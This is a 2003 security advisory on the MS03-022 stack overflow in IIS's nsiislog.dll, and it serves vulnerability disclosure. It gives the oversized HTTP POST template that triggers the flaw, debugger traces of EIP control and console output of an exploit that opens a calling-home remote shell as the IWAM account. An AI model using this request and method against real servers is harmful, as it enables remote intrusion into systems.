A short time after a long time ago, in a place very similar to the last,
where the sun shines, the snow falls and the water is still clean…
Continuing with our 'Methodical Approach To Finding Overflows' against
nsiislog.dll we discovered another issue but due to complications this
fix was not released with the previous nsiislog.dll bulletin.
== MS03-022 states ==
Impact of vulnerability: Allow an attacker to execute code of their choice
Maximum Severity Rating: Important
There is a flaw in the way nsiislog.dll processes incoming client requests.
A vulnerability exists because an attacker could send specially formed HTTP
request (communications) to the server that could cause IIS to fail or
execute code on the user's system.
== MS03-022 ==
== Description ==
Sending a large standard post to nsiislog.dll will cause an access
violation resulting in the following error log.
This results in a standard stack based overflow, resulting in EIP
been set to an arbitrary value allowing for remote command execution
with privileges associated with the IWAM_machinename account.
== Standard HTTP Post ==
POST /scripts/nsiislog.dll HTTP/1.1
content-length: <postlength>
<post data>
Using Size: 4354
Connecting…Sending Buffer…
78028E9F mov al,byte ptr [esi] ESI = 00B138B4
Using Size: 5000
Connecting…Sending Buffer…
40F01F3B repne scas byte ptr [edi] EDI = 58585858
58585858 ??? illegal op EIP = 58585858
== Exploitation ==
Commonly referred to as a stack based overflow, control is taken when the
EIP is set to a value from the stack. Widely known and easily exploitable
by using a call or jmp instruction or in the worst case a brute force
technique of direct jumps.
In this case control is taken when a value is obtained from the stack
and then used in a direct call.
77FB98E1 mov ecx,dword ptr [ebp+18h]
77FB98E4 call ecx
== Exploit Example ==
%:\>exploit 192.168.1.63
IISNSLOG.DLL - Remote Shell
. Calling Home: blackhole:2000
. Shellcode Size: 322 bytes
. Preparing Exploit Buffer…Ready
. Starting Listener On Port: 2000
. Connecting To Target
. Sending Exploit…Exploit Sent
. Connection Received
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\WINNT\system32>whoami
IWAM_BLACKHOLE
C:\WINNT\system32>
== Solutions ==
== Credit ==
Discovered and advised to Microsoft January 30, 2003 by Brett Moore of
Security-Assessment.com
%-) viva Las Vegas!!
== About Security-Assessment.com ==
Security-Assessment.com is a leader in intrusion testing and security
code review, and leads the world with SA-ISO, online ISO17799 compliance
management solution. Security-Assessment.com is committed to security
research and development, and its team have previously identified a
number of vulnerabilities in public and private software vendors products.
oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo
Are You "Certifiable"? Summer's Hottest Certification Just Got HOTTER!
With a growth rate exceeding 110%, the TICSA security practitioner
certification is one of the hottest IT credentials available. And now, for
a limited time, you can save 33% off of the TICSA certification exam! To
learn more about the TICSA certification, and to register as a TICSA
candidate online, just go to
http://www.trusecure.com/offer/s0100/
oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo